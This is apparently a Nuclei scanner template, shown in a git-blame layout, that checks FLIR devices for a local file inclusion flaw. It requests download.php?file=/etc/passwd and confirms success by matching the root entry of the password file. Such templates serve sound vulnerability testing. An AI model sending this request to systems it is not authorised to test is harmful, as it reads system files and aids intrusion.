2021-05-16 04:54:40 +00:00
|
|
|
id: flir-path-traversal
|
|
|
|
|
|
|
|
info:
|
2022-07-27 20:17:31 +00:00
|
|
|
name: Flir - Local File Inclusion
|
2021-05-16 04:54:40 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
2022-07-27 20:17:31 +00:00
|
|
|
description: Flir is vulnerable to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://juejin.cn/post/6961370156484263972
|
2022-07-27 20:17:31 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: flir,lfi
|
2021-05-16 04:54:40 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-05-16 04:54:40 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/download.php?file=/etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-05-16 04:54:40 +00:00
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022100bad158c6a744528dcd907ab28751473970a31cdffc9362e2c2b06584ce884e0a0220140768cc95b08aa817c0f72101f7a6508d90dd2d2b607a4c998098149cc7479a:922c64590222798bb761d5b6d8e72950
|